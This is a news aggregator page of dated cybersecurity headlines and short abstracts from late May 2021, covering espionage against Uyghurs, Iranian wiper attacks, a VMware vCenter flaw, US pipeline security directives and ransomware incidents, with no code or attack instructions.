Abstract Three Republican senators say they won’t back President Biden’s nominee to serve as the top lawyer for the intelligence community because of his past experience working for a Chinese company accused of intellectual property theft.

The Hill

May 27, 2021 – Hacker

Hackers Using Fake Foundations to Target Uyghur Minority in China Full Text

Abstract The Uyghur community located in China and Pakistan has been the subject of an ongoing espionage campaign aiming to trick the targets into downloading a Windows backdoor to amass sensitive information from their systems. "Considerable effort was put into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up to date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups," according to joint research published by Check Point Research and Kaspersky today. The Uyghurs are a Turkic ethnic minority group originating from Central and East Asia and are recognized as native to the Xinjiang Uyghur Autonomous Region in Northwest China. At least since 2015, government authorities have placed the region under tight surveillance, putting hundreds of thousands into prisons and internment camps that the government calls "Vocational Education and Training Centers.

The Hacker News

May 27, 2021 – Government

Feds Warn DarkSide May Not Stay Dark Full Text

Abstract Officials warn disbanded cyber-criminal gang may return soon under a new alias

Infosecurity Magazine

May 27, 2021 – Government

DHS announces security measures for critical pipeline industry Full Text

Abstract The US Department of Homeland Security (DHS) has announced new cybersecurity requirements for critical pipeline owners and operators. The Colonial pipeline incident continues to have a serious impact on the critical infrastructure sector. The US Department...

Security Affairs

May 27, 2021 – Government

Fraud and security departments converge on battle against ‘synthetic identities’ Full Text

Abstract The Federal Reserve recently produced a formal definition for synthetic identity fraud, a process that involved a committee of a dozen outside experts convening over nine months. So what is it? And why should CISOs care?

SCMagazine

May 27, 2021 – Attack

New BazaFlix attack pushes BazarLoader malware via fake movie site Full Text

Abstract Security researchers found a new BazarCall email phishing campaign that manages to bypass automated threat detection systems to deliver the BazarLoader malware used by the TrickBot gang.

BleepingComputer

May 27, 2021 – Attack

QNAP Devices Bombarded by Cyberattacks Full Text

Abstract Attacks on Taiwan-based QNAP continue to turn ugly. It is now advising its clients to update the HBS 3 disaster recovery app to block Qlocker ransomware actors who now use a backdoor that exploits a hard-coded credentials vulnerability.

Cyware Alerts - Hacker News

May 27, 2021 – General

TSA formally directs pipeline companies to report cybersecurity incidents in wake of Colonial attack Full Text

Abstract The Transportation Security Administration (TSA) will formally issue a security directive Thursday to strengthen federal cybersecurity oversight of pipelines, weeks after a ransomware attack on Colonial Pipeline led to fuel shortages in multiple states. 

The Hill

May 27, 2021 – Breach

Data Breach at Canada Post Full Text

Abstract Malware attack on third-party supplier leads to data breach at Canada Post

Infosecurity Magazine

May 27, 2021 – General

NASA identified 1,785 cyber incidents in 2020 Full Text

Abstract NASA identified more than 6,000 cyber-related incidents in the last four years, according to a report published by its Office of Inspector General. The U.S. National Aeronautics and Space Administration (NASA) has identified more than 6,000 cyber-related...

Security Affairs

May 27, 2021 – Attack

How Florida water attack investigators avoided an embarrassing misattribution Full Text

Abstract Dragos limited initial disclosure to only relevant parties, after discovering a watering-hole malware attack that later turned out to be unrelated.

SCMagazine

May 27, 2021 – Vulnerabilities

Klarna mobile app bug let users log into other customers’ accounts Full Text

Abstract Klarna Bank suffered a severe technical issue this morning that allowed mobile app users to log into other customers' accounts and see their stored information.

BleepingComputer

May 27, 2021 – Policy and Law

French authorities seize their third dark web marketplace Full Text

Abstract French authorities have dismantled their third dark web marketplace over the last four years after they seized control of “Le Monde Parallèle” (The Parallel World) last week.

The Record

May 27, 2021 – Phishing

Uyghurs targeted by fake human rights emails Full Text

Abstract Members of the Uyghur Muslim community in China and abroad are being targeted in a surveillance efforts by likely "Chinese-speaking" hackers through the use of fake emails from the United Nations (U.N.) and a human rights group, cybersecurity researchers announced Thursday. 

The Hill

May 27, 2021 – Phishing

Chinese Phishing Attack Targets High-Profile Uyghurs Full Text

Abstract Kaspersky and Check Point team up to reveal latest espionage campaign

Infosecurity Magazine

May 27, 2021 – Breach

Hackers compromised Japanese government offices via Fujitsu ‘s ProjectWEB tool Full Text

Abstract Threat actors have compromised offices of multiple Japanese agencies via Fujitsu 's ProjectWEB information sharing tool. Threat actors have breached the offices of multiple Japanese agencies after they have gained access to projects that uses the Fujitsu...

Security Affairs

May 27, 2021 – Government

DHS issues cyber order to pipeline operators in first move to regulate critical infrastructure sectors Full Text

Abstract The TSA order marks the first mandatory cybersecurity practices for pipelines, and what some expect will be the first of more standards that the government puts in place to regulate how critical infrastructure operators protect networks and systems.

SCMagazine

May 27, 2021 – Government

US announces new security directive after critical pipeline hack Full Text

Abstract The US Department of Homeland Security (DHS) has announced new pipeline cybersecurity requirements after the largest fuel pipeline in the United States was forced to shut down operations in early May following a ransomware attack.

BleepingComputer

May 27, 2021 – Attack

Fake Human Rights Organization, UN Branding Used by Chinese Threat Actor to Target Uyghurs in Ongoing Cyberattacks Full Text

Abstract Potential victims are sent phishing documents branded with the UNHRC logo. Named UgyhurApplicationList.docx, this document contains decoy material relating to discussions of human rights violations.

ZDNet

May 27, 2021 – General

Number of Breached Records Soars 224% Annually Full Text

Abstract Imperva warns of gap between security and digital adoption

Infosecurity Magazine

May 27, 2021 – Vulnerabilities

HPE fixes critical zero-day vulnerability disclosed in December Full Text

Abstract Hewlett Packard Enterprise (HPE) has released a security update to address a zero-day remote code execution vulnerability disclosed last year, in December.

BleepingComputer

May 27, 2021 – Attack

Canada Post Among 44 Organizations Linked to 950,000 Customers Impacted by Malware Attack at Crown Corporation Full Text

Abstract A malware attack on Crown Corporation has caused a data breach affecting 44 of the company’s large business clients and their 950,000 receiving customers, the postal agency confirmed Wednesday.

Global News

May 27, 2021 – Covid-19

A Third of #COVID19 Fraud Victims Go Hungry Full Text

Abstract ITRC report claims many don’t have money for food or utilities

Infosecurity Magazine

May 27, 2021 – Government

Japan Expects Russian Cyberattacks on Tokyo Summer Olympics Full Text

Abstract According to Masatoshi Fujitani, president of the Tokyo-based Japan Forum for Strategic Studies (JFSS), the Summer Olympics in Tokyo are likely to be targeted by cyberattacks.

Softpedia

May 27, 2021 – Government

Russian Intelligence Agency FSB Reports Hacking Campaign Aimed at Government Agencies Full Text

Abstract The report also mentioned that hackers had used the cloud storage facilities of Russia's leading technology firms, Yandex and Mail.ru, to help exfiltrate data stolen from the government agencies.

US News

May 27, 2021 – Malware

Melting Ice - Tracking IcedID Servers with a few simple steps Full Text

Abstract This threat has constantly been growing in the past year and boasts a wide range of malicious capabilities such as browser hooking, credential theft, MiTM proxy setup, and a VNC module, among others.

Check Point Research

May 27, 2021 – General

Cyber attacks on banks can trigger more rating action, warns S&P Full Text

Abstract Cyberattacks can harm credit ratings mainly through reputational damage and potential monetary losses, the ratings agency said in a report titled 'Cyber Risk In A New Era: The Effect On Bank Ratings.'

The Times Of India

May 27, 2021 – Vulnerabilities

M1RACLES, the unpatchable bug that impacts new Apple M1 chips Full Text

Abstract A security expert has discovered a vulnerability in Apple M1 chips, dubbed M1RACLES, that cannot be fixed. Software engineer Hector Martin from Asahi Linux has discovered a vulnerability in the new Apple M1 chips, tracked as CVE-2021-30747, that was named...

Security Affairs

May 27, 2021 – Breach

Japanese government agencies suffer data breaches after Fujitsu hack Full Text

Abstract Offices of multiple Japanese agencies were breached via Fujitsu's "ProjectWEB" information sharing tool. Fujitsu states that attackers gained unauthorized access to projects that used ProjectWEB, and stole some customer data.

BleepingComputer

May 26, 2021 – Vulnerabilities

Newly Discovered Bugs in VSCode Extensions Could Lead to Supply Chain Attacks Full Text

Abstract Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks. Some of the extensions in question are "LaTeX Workshop," "Rainbow Fart," "Open in Default Browser," and "Instant Markdown," all of which have cumulatively racked up about two million installations between them. "Developer machines usually hold significant credentials, allowing them (directly or indirectly) to interact with many parts of the product," researchers from open-source security platform Synk  said  in a deep-dive published on May 26. "Leaking a developer's private key can allow a malicious stakeholder to clone important

The Hacker News

May 26, 2021 – Criminals

Cybercriminals Exploiting API Keys to Steal Cryptocurrency Full Text

Abstract Stolen API keys are being increasingly sold on hacker forums. Cyber adversaries are exploiting cryptocurrency exchange API keys and using them to steal cryptocurrencies from victims.

Cyware Alerts - Hacker News

May 26, 2021 – General

Hillicon Valley: Activists tackle shareholder meetings | Amazon to acquire MGM | EU updates disinformation rules Full Text

Abstract Happy Wednesday! Shareholder meetings are providing activists an opportunity to push tech giants on issues including civil rights violations, hate speech and whistleblower protections. In other news, Amazon announced its intention to acquire MGM Studios in a move sure to heighten already elevated antitrust scrutiny against the e-commerce giant.

The Hill

May 26, 2021 – Malware

Data Wiper Malware Disguised As Ransomware Targets Israeli Entities Full Text

Abstract Researchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions. Cybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker "Agrius." "An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets," the researchers  said . "The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups." The group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second

The Hacker News

May 26, 2021 – Disinformation

Influencers Offered Money to Vilify Vaccine Full Text

Abstract PR agency allegedly asked influencers to discredit Pfizer vaccine in exchange for payment

Infosecurity Magazine

May 26, 2021 – Breach

Nearly 50,000 IPs compromised in Kubernetes clusters by TeamTNT Full Text

Abstract Researchers discovered about 50,000 IPs across multiple Kubernetes clusters that were compromised by the TeamTNT.threat actors. Researchers from Trend Micro reported that about 50,000 IPs were compromised across multiple Kubernetes clusters in a cryptojacking...

Security Affairs

May 26, 2021 – Government

Colonial Pipeline, Microsoft, crypto crackdowns: Feds point to critical cyber moments Full Text

Abstract Three law enforcement officials reflect on what was, to them, the biggest cybercrime stories or developments over the past year.

SCMagazine

May 26, 2021 – Ransomware

A Peek Inside the Underground Ransomware Economy Full Text

Abstract Threat hunters weigh in on how the business of ransomware, the complex relationships between cybercriminals, and how they work together and hawk their wares on the Dark Web.

Threatpost

May 26, 2021 – General

FBI’s IC3 Logs 1 Million Scam Complaints in 14 Months Full Text

Abstract While these numbers point to the fact that people are more aware and thus, are logging their complaints, they also signify that a greater number of people are being impacted by online scams.

Cyware Alerts - Hacker News

May 26, 2021 – Criminals

Hackers release patient data stolen from New Zealand health systems Full Text

Abstract Hackers sent patient data stolen during an attack on New Zealand’s Waikato District health system to local media outlets on Wednesday, with the outlets declining to publish the sensitive information. 

The Hill

May 26, 2021 – Criminals

Cyber-criminal Gang Targets Texas Unemployment System Full Text

Abstract Scattered Canary shares 13-page tutorial on how to commit fraud via Texas Workforce Commission website

Infosecurity Magazine

May 26, 2021 – Policy and Law

French police seized dark web marketplace Le Monde Parallèle Full Text

Abstract Last week, French authorities have seized the dark web marketplace Le Monde Parallèle, it is another success of national police in the fight against cybercrime. French authorities seized the dark web marketplace Le Monde Parallèle, the operation...

Security Affairs

May 26, 2021 – Malware

Malware used zero-day exploit to take screenshots of victims’ Macs Full Text

Abstract The TCC bypass exploit could have allowed attackers to create ransomware that encrypts protected system files and folders without user knowledge.

SCMagazine

May 26, 2021 – Ransomware

Double Encryption: A New Ransomware Trend Full Text

Abstract This is not the first time researchers spotted double encryption. It usually happens when two distinct ransomware groups compromise the same victim at the same time.

Cyware Alerts - Hacker News

May 26, 2021 – Skimming

22 Americans Indicted Over Card-Skimming Scam Full Text

Abstract Nearly two dozen individuals charged with purchasing and using payment cards stolen from national retail chain

Infosecurity Magazine

May 26, 2021 – Attack

Google discovered a new variant of Rowhammer attack dubbed Half-Double Full Text

Abstract Google experts discovered a new variant of Rowhammer attack against RAM memory cards that bypasses all current defenses Google researchers discovered a new variant of Rowhammer attacks, dubbed "Half-Double," that allows bypassing all current defenses. In...

Security Affairs

May 26, 2021 – Vulnerabilities

Chrome 91 features 32 security fixes, enhancements for Linux Full Text

Abstract Google’s high-severity fixes address weaknesses that could potentially allow a remote attacker to execute arbitrary code on an unknowing target.

SCMagazine

May 26, 2021 – Government

NASA Intends to Reorganize its Cybersecurity Strategy Full Text

Abstract As per a report issued by NASA's inspector general, "Attacks on NASA networks are not a new phenomenon, although attempts to steal critical information are increasing in both complexity and severity".

Softpedia

May 26, 2021 – Privacy

NHS to Share Patient Data with Third Parties, Fueling Privacy and Security Fears Full Text

Abstract Sensitive data will be made available to academic and commercial third parties for research and planning

Infosecurity Magazine

May 26, 2021 – Attack

Belgium Interior Ministry said it was hit by a sophisticated cyber attack Full Text

Abstract The Belgian interior ministry was targeted by a "sophisticated" cyber attack, a spokesman told RTBF public television on Tuesday.  The Belgian interior ministry was hit by a "sophisticated" cyber-espionage attack, the news was confirmed by a spokesman...

Security Affairs

May 26, 2021 – Vulnerabilities

M1RACLES bug impacts Apple M1 chips, but no need to panic Full Text

Abstract Discovered by Hector Martin, a software engineer at Asahi Linux, a project that works on porting Linux for Mac hardware, the vulnerability was codenamed M1RACLES and tracked as CVE-2021-30747.

The Record

May 26, 2021 – Breach

UK Police Suffered Thousands of Data Breaches in 2020 Full Text

Abstract Lancashire Constabulary was the worst offender

Infosecurity Magazine

May 26, 2021 – Vulnerabilities

Another critical bug impacts all VMware vCenter Server installs Full Text

Abstract VMware addresses a critical remote code execution (RCE) flaw in the Virtual SAN Health Check plug-in that impacts all vCenter Server installs. VMware has released security updates to address a remote code execution (RCE) flaw in vCenter Server that...

Security Affairs

May 26, 2021 – Business

Salt Security Raises $70 Million To Strengthen API Security Full Text

Abstract Salt Security closed a $70 million Series C funding round led by Advent International to scale the company’s sales organization globally and enhance security earlier in the development lifecycle.

CRN

May 26, 2021 – Attack

Bose Reveals Ransomware Attack Impacting Staff Full Text

Abstract Threat actors accessed sensitive personal information

Infosecurity Magazine

May 26, 2021 – Vulnerabilities

Thousands of Chrome Extensions Found Tampering with Security Headers Full Text

Abstract Thousands of Google Chrome extensions available on the official Chrome Web Store are tampering with security headers on popular websites, putting users at risk of a wide range of web-based attacks.

The Record

May 26, 2021 – Business

Cybersecurity monitoring and threat prevention startup Uptycs raises $50M Full Text

Abstract Cloud security analytics platform Uptycs today announced it has raised $50 million in a Series C funding round led by Norwest Venture Partners, bringing the company’s total raised to $93 million.

Venture Beat

May 26, 2021 – Policy and Law

Europe’s Top Human Rights Court Rules UK Mass Surveillance Illegal Full Text

Abstract Case could pave way for challenges to Snooper’s Charter

Infosecurity Magazine

May 26, 2021 – General

Not as complex as we thought: Cyberattacks on operational technology are on the rise Full Text

Abstract Over the past few years, the researchers have observed OT assets becoming compromised through a variety of methods, including remote access services and virtual network computing (VNC).

ZDNet

May 26, 2021 – Policy and Law

WhatsApp Sues Indian Government Over New Privacy Threatening Internet Law Full Text

Abstract WhatsApp on Wednesday fired a legal salvo against the Indian government to block new regulations that would require messaging apps to trace the "first originator" of messages shared on the platform, thus effectively breaking encryption protections. "Requiring messaging apps to 'trace' chats is the equivalent of asking us to keep a fingerprint of every single message sent on WhatsApp, which would break end-to-end encryption and fundamentally undermines people's right to privacy," a WhatsApp spokesperson told The Hacker News via email. "We have consistently joined civil society and experts around the world in opposing requirements that would violate the privacy of our users." With over 450 million active users, India is WhatsApp's biggest market by users.  The lawsuit, filed by the Facebook-owned messaging service in the Delhi High Court, seeks to bar new internet rules that come into force effective May 26. Called the Intermediary Guide

The Hacker News

May 26, 2021 – Government

DHS to issue first cybersecurity regulations for pipelines after Colonial hack Full Text

Abstract The Transportation Security Administration will issue a security directive this week requiring pipeline companies to report cyber incidents to federal authorities, senior DHS officials said.

Washington Post

May 26, 2021 – Malware

SolarMarker Backdoor Pretends to be Legit PDFescape Installer Full Text

Abstract The SolarMarker backdoor pretends to be a legit PDFescape installer. It creates an encoded file and then executes a Power Shell Script command to decode and execute the malicious script.

Cyren

May 26, 2021 – Hacker

Agrius group targets Israel with data-wipers disguised as ransomware Full Text

Abstract An Iran-linked threat actor tracked as Agrius employed data-wipers disguised as ransomware to destroy targeted IT infrastructure. Researchers from cyber-security firm SentinelOne discovered a new Iran-linked threat actor, tracked as Agrius, which...

Security Affairs

May 25, 2021 – General

Russian Hydra DarkNet Market Made Over $1.3 Billion in 2020 Full Text

Abstract Russian-language dark web marketplace Hydra has emerged as a hotspot for illicit activities, pulling in a whopping $1.37 billion worth of cryptocurrencies in 2020, up from $9.4 million in 2016. The "blistering growth" in annual transaction volumes marks a staggering 624% year-over-year jump over a three-year period from 2018 to 2020. "Further buoying Hydra's growth is its ability—or its good fortune—to remain running and unscathed against competitor attacks or  law enforcement scrutiny ; its only downtime of note occurred during a short time period at the beginning of the COVID-19 global pandemic in late March 2020," threat intelligence firm Flashpoint  said  in a report jointly published with blockchain analysis firm Chainalysis. Active since 2015, Hydra opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily facilitating narcotics trade, before becoming a bazaar for all things criminal, including offering BTC cash-out

The Hacker News

May 25, 2021 – Vulnerabilities

Critical RCE Vulnerability Found in VMware vCenter Server — Patch Now! Full Text

Abstract VMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server. Tracked as CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN ( vSAN ) Health Check plug-in, which is enabled by default in the vCenter Server. "A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server," VMware  said  in its advisory. VMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability. The patch release also rectifies an authenticati

The Hacker News

May 25, 2021 – General

Security pros rely on peer groups and open communication for help with stress Full Text

Abstract More than ever, it’s vital that infosec colleagues and company leadership lend a sympathetic ear and establish a trusting relationship.

SCMagazine

May 25, 2021 – Encryption

Post-quantum cryptographic standards to be finalized later this year Full Text

Abstract The new cryptographic standards will likely underpin IT design and guide industrial purchasing decisions for decades to come.

SCMagazine

May 25, 2021 – General

Hillicon Valley: DC attorney general files antitrust lawsuit against Amazon | DHS to require pipeline companies to report cyberattacks | Activists, parents urge Facebook to drop Instagram for kids plan Full Text

Abstract Amazon found itself in hot water on Tuesday, with the Washington, D.C. attorney general filing an antitrust lawsuit against it, and over 600 Amazon tech workers separately calling on the company to address pollution levels concentrated in communities of color. Meanwhile, two branches of the Department of Homeland will soon issue guidance requiring pipeline companies to report cybersecurity incidents to federal authorities following the Colonial Pipeline hack, and thousands of activists and parents are calling on Facebook to drop its plans for an Instagram for kids. 

The Hill

May 25, 2021 – Privacy

Lawmakers request investigation into Postal Service’s covert operations program Full Text

Abstract The bipartisan leaders of the House Oversight and Reform Committee on Tuesday requested an investigation into a branch of the U.S. Postal Service in the wake of reports that it carried out online surveillance of Americans’ social media posts. 

The Hill

May 25, 2021 – Vulnerabilities

Ivanti fixes high severity flaw in Pulse Connect Secure VPN Full Text

Abstract A flaw in Pulse Connect Secure VPN could allow an authenticated remote attacker to execute arbitrary code with elevated privileges. Ivanti addressed a high severity Buffer Overflow vulnerability in Secure VPN appliances that could allow a remote authenticated...

Security Affairs

May 25, 2021 – General

Average losses from compromised cloud accounts is more than $500,000 a year Full Text

Abstract The report also noted that 68% of respondents believe cloud account takeovers present a significant security risk to their organizations – and more than 50% indicated that the frequency and severity of cloud account compromises increased over the past year.

SCMagazine

May 25, 2021 – Attack

Threat Actor ‘Agrius’ Emerges to Launch Wiper Attacks Against Israeli Targets Full Text

Abstract The group is using ransomware intended to make its espionage and destruction efforts appear financially motivated.

Threatpost

May 25, 2021 – Vulnerabilities

Apple Patches Zero-Day Flaw in MacOS that Allows for Sneaky Screenshots Full Text

Abstract Security researchers at Jamf discovered the XCSSET malware exploiting the vulnerability, patched in Big Sur 11.4, to take photos of people’s computer screens without their knowing.

Threatpost

May 25, 2021 – Government

US to Regulate Pipeline Cybersecurity Full Text

Abstract Department of Homeland Security to issue first cybersecurity regulations for pipelines after Colonial cyber-attack

Infosecurity Magazine

May 25, 2021 – Breach

Domino’s India discloses data breach after hackers sell data online Full Text

Abstract Domino's India has disclosed a data breach after a threat actor hacked their systems and sold their stolen data on a hacking forum.

BleepingComputer

May 25, 2021 – Vulnerabilities

VMware warns of critical bug affecting all vCenter Server installs Full Text

Abstract VMware urges customers to patch a critical remote code execution (RCE) vulnerability in the Virtual SAN Health Check plug-in and impacting all vCenter Server deployments.

BleepingComputer

May 25, 2021 – Breach

Mobile Apps Exposing Personal Data of Millions of Users Full Text

Abstract Insecure data storage is the most common security flaw in Android apps. Recently, security analysts listed down 23 Android applications leaking personal data of over 100 million users due to misconfigurations in third-party cloud services.

Cyware Alerts - Hacker News

May 25, 2021 – General

E-tailers See Surge in Automated Fraud Full Text

Abstract Research into 2020 automated e-commerce fraud finds higher volume, frequency and sophistication

Infosecurity Magazine

May 25, 2021 – Botnet

Phorpiex Botnet is Still Active and Thriving Full Text

Abstract Decade-old botnets continue to adapt to the current threat landscape, as seen in the case of wide-ranging malicious activities of the resilient Phorpiex botnet. Though, for many years, the Phopiex botnet has had the same internal infrastructure with C2 mechanisms and source code.

Cyware Alerts - Hacker News

May 25, 2021 – Ransomware

Iranian hacking group Agrius pretends to encrypt files for a ransom, destroys them instead Full Text

Abstract The group uses a combination of its own custom toolsets and readily available offensive security software to deploy either a destructive wiper or a custom wiper-turned-ransomware variant.

ZDNet

May 25, 2021 – Government

Coast Guard to Create Red Team Full Text

Abstract US Coast Guard to establish Cyber Operational Assessments Branch and form first red team

Infosecurity Magazine

May 25, 2021 – Malware

STRRAT - The RAT that Wants to be a Ransomware Full Text

Abstract Microsoft is warning against a malware campaign by STRRAT, a RAT first spotted in June 2020. It camouflages as ransomware and supports various features such as logging keystrokes, collecting browser passwords, and running remote commands and PowerShell. Organizations should stay alert and offer tra ... Read More

Cyware Alerts - Hacker News

May 25, 2021 – Attack

Codecov Supply Chain Attack Still Haunts Organizations Full Text

Abstract Does the CodeCov supply chain attack has echoes of SolarWinds? More victims surface with time in yet another months-long ripple effect of a supply chain attack. Users of Codecov are suggested to perform a thorough scan of their CI-CD pipelines and change their secret keys and passwords.

Cyware Alerts - Hacker News

May 25, 2021 – Breach

US Healthcare Non-Profit RMCHCS Reports Data Breach Affecting 200,000 Patients, Employees Full Text

Abstract The potentially exposed information includes names, dates of birth, postal addresses, telephone numbers, and email addresses, SSNs, driver’s license, passport, and tribal ID numbers.

The Daily Swig

May 25, 2021 – Government

DHS to require pipeline companies to report cyberattacks Full Text

Abstract The Department of Homeland Security (DHS) will issue a directive later this week requiring all pipeline companies to report cyber incidents to federal authorities in the wake of a devastating ransomware attack on Colonial Pipeline that forced a shutdown of operations.

The Hill

May 25, 2021 – Vulnerabilities

Trend Micro Bugs Threaten Home Network Security Full Text

Abstract The security vendor’s network management and threat protection station can open the door to code execution, DoS and potential PC takeovers.

Threatpost

May 25, 2021 – Business

Security startup Tessian, which uses AI to fight social engineering, trousers $65M Full Text

Abstract The Series C round was led by March Capital. Existing investors Accel, Balderton Capital, Latitude, and Sequoia Capital also participated, along with new investor Schroder Adveq.

TechCrunch

May 25, 2021 – General

Victims lose millions to healthcare related eCrime Full Text

Abstract Victim losses from healthcare-related eCrime in the U.S. rose by 2,473 percent during 2020 as the COVID-19 pandemic swept through the nation and world, CrowdStrike reveals.

Help Net Security

May 25, 2021 – Attack

TeamTNT Targets Kubernetes Clusters and Infiltrates Nearly 50,000 IPs in Worm-like Attack Full Text

Abstract Most of the compromised nodes were from China and the United States — identified in the ISP list, which had Chinese and US-based providers as the highest hits, including some CSPs.

Trend Micro

May 25, 2021 – General

The New Normal Full Text

Abstract As governments start loosening the restrictions due to COVID-19, we are starting to see a change in attack vectors. In fact, the new normal for cyber attacks is starting to look a lot like the old normal. FortiGuard Labs provides its insights in the changes it is seeing in attack vectors and provides insights into…

SCMagazine

May 25, 2021 – Denial Of Service

DDoS hacking attempts drop in Q1 2021: Report Full Text

Abstract In the first quarter of 2021, the number of DDoS attacks dropped by 29% compared to the same period in 2020, but increased by 47% compared to the fourth quarter in 2020, says a Kaspersky report.

The Times Of India

May 25, 2021 – Attack

Hacking Attack on Japanese Dating App Omiai Puts 1.71 Million Users at Risk Full Text

Abstract Japanese dating app operator Net Marketing Co. said Friday personal data of 1.71 million users, including names and face photos, was likely leaked due to unauthorized access to its server.

The Japan Times

May 25, 2021 – Ransomware

Iranian hacking group targets Israel with wiper disguised as ransomware Full Text

Abstract An Iranian hacking group has been observed camouflaging destructive attacks against Israeli targets as ransomware attacks while maintaining access to victims' networks for months in what looks like an extensive espionage campaign.

BleepingComputer

May 25, 2021 – Breach

Bose Admits Ransomware Hit: Employee Data Accessed Full Text

Abstract The consumer-electronics stalwart was able to recover without paying a ransom, it said.

Threatpost

May 25, 2021 – Vulnerabilities

Pulse Secure VPNs Get Quick Fix for Critical RCE Full Text

Abstract One of the workaround XML files automatically deactivates protection from an earlier workaround: a potential path to older vulnerabilities being opened again.

Threatpost

May 25, 2021 – Ransomware

Evolution of JSWorm ransomware Full Text

Abstract Several versions of JSWorm were released as part of each “rebranded” variant that altered different aspects of the code, renamed file extensions, cryptographic schemes, and encryption keys.

Kaspersky Labs

May 25, 2021 – Government

Hack, Disinform, Deny: Russia’s Cybersecurity Strategy Full Text

Abstract In the past, Moscow has faced numerous allegations of cyberattacks that resulted in multiple sanctions and the expulsion of its diplomats. The term "hacker" has almost become synonymous with Russia.

Security Week

May 25, 2021 – General

Download Ultimate ‘Security for Management’ Presentation Template Full Text

Abstract There is a person in every organization that is the direct owner of breach protection. His or her task is to oversee and govern the process of design, build, maintain, and continuously enhance the security level of the organization. Title-wise, this person is most often either the CIO, CISO, or Directory of IT. For convenience, we'll refer to this individual as the CISO. This person is the subject-matter expert in understanding the standard set of active cyber risks, benchmarking to what degree the organization's exposure influences potential impact. They then take appropriate steps to ensure the major risks are addressed. On top of being engaged 24/7 in the organization's actual breach protection activity, the CISO has another critical task: to articulate the risks, potential impacts and appropriate steps to take to the company's management – or in other words, they must effectively translate security issues for non-security-savvy executives in a clear and busi

The Hacker News

May 25, 2021 – General

Three-Quarters of CISOs Predict Another SolarWinds-Style Attack Full Text

Abstract Splunk warns that cloud complexity is a major threat

Infosecurity Magazine

May 25, 2021 – Privacy

The Cyberlaw Podcast: Is Apple Storing Its Dorian Gray Portrait Behind the Great Firewall? Full Text

Abstract Paul Rosenzweig kicks off the news roundup by laying out the New York Times’s brutal overview of the many compromises Tim Cook’s Apple has made with an increasingly oppressive Chinese government. There is no way to square Apple’s aggressive opposition to U.S. national security measures with its quiet surrender to much more demanding Chinese measures.

Lawfare

May 25, 2021 – Vulnerabilities

Trend Micro fixes 3 flaws in Home Network Security Devices Full Text

Abstract Trend Micro fixed some flaws in Trend Micro Home Network Security devices that could be exploited to elevate privileges or achieve arbitrary authentication. Trend Micro fixed three vulnerabilities in Home Network Security devices that could be exploited...

Security Affairs

May 25, 2021 – General

Low sophistication OT breaches on the rise, with hackers learning from easy wins Full Text

Abstract Hackers with minimal experience and technical expertise are increasingly targeting industrial networks, driving a new wave of low sophistication OT breaches that researchers tells SC Media is a strong learning opportunity for criminals looking to monetize their work. The low sophistication attacks, which are outlined by Mandiant in a new blog post released Tuesday, encompass…

SCMagazine

May 25, 2021 – Vulnerabilities

How data manipulation could be used to trick fraud detection algorithms on e-commerce sites Full Text

Abstract A data poisoning attack aims to modify a machine learning model’s training set by inserting incorrectly labeled data with the goal of tricking it into making incorrect predictions.

Help Net Security

May 25, 2021 – General

Cyber-Insurance Premiums Surged by Up to 30% in 2020 Full Text

Abstract GAO report warns of lower coverage limits for some verticals

Infosecurity Magazine

May 25, 2021 – Vulnerabilities

Apple addresses three zero-day flaws actively exploited in the wild Full Text

Abstract Apple has addressed three zero-day vulnerabilities in macOS and tvOS actively exploited in the wild by threat actors. Apple has released security updates to address three zero-day vulnerabilities affecting macOS and tvOS which have been exploited...

Security Affairs

May 25, 2021 – Breach

13 Million Users’ Personal Details Leaked Online After DailyQuiz Data Breach Full Text

Abstract The personal details of 13 million DailyQuiz users have been leaked online earlier this year after a hacker breached the quiz builder’s database and stole its content, which he later put up for sale.

The Record

May 25, 2021 – Policy and Law

GDPR Anniversary: Security Leaders More Concerned About Litigation Than Fines Full Text

Abstract 90% of security leaders are concerned about data breach litigation because of GDPR

Infosecurity Magazine

May 25, 2021 – Attack

Audio equipment maker Bose Corporation discloses a ransomware attack Full Text

Abstract The audio equipment manufacturer Bose Corporation said it was the victim of a ransomware attack that took place earlier this year, on March 7. Bose Corporation has announced it was the victim of a ransomware attack that took place earlier this year,...

Security Affairs

May 25, 2021 – General

Open source ecosystem ripe for dependency confusion attacks, research finds Full Text

Abstract Of the 1,000 organizations whose GitHub accounts were analyzed by a researcher, more than one in five – 212 – contained at least one dependency confusion-related misconfiguration in their codebase.

The Daily Swig

May 25, 2021 – Vulnerabilities

Mozilla Thunderbird was saving OpenPGP keys in plaintext after encryption snafu Full Text

Abstract The vulnerability, tracked as CVE-2021-29956 and assessed as “low” impact by Mozilla, existed in the free open-source Thunderbird email client between version 78.8.1 and version 78.10.1.

The Register

May 25, 2021 – Vulnerabilities

Trend Micro Patches Vulnerabilities in Home Network Security Devices Full Text

Abstract Vulnerabilities identified by security researchers with Cisco’s Talos unit in Trend Micro Home Network Security devices could be exploited to elevate privileges or achieve arbitrary authentication.

Security Week

May 25, 2021 – Attack

Ransomware Hit: Tulsa Promises Recovery, Not Ransom Paying Full Text

Abstract Restoration work is continuing. "All of our computer systems - with a few exceptions - are down right now," Michael Derringer, the city's CIO, said at a press conference on Thursday.

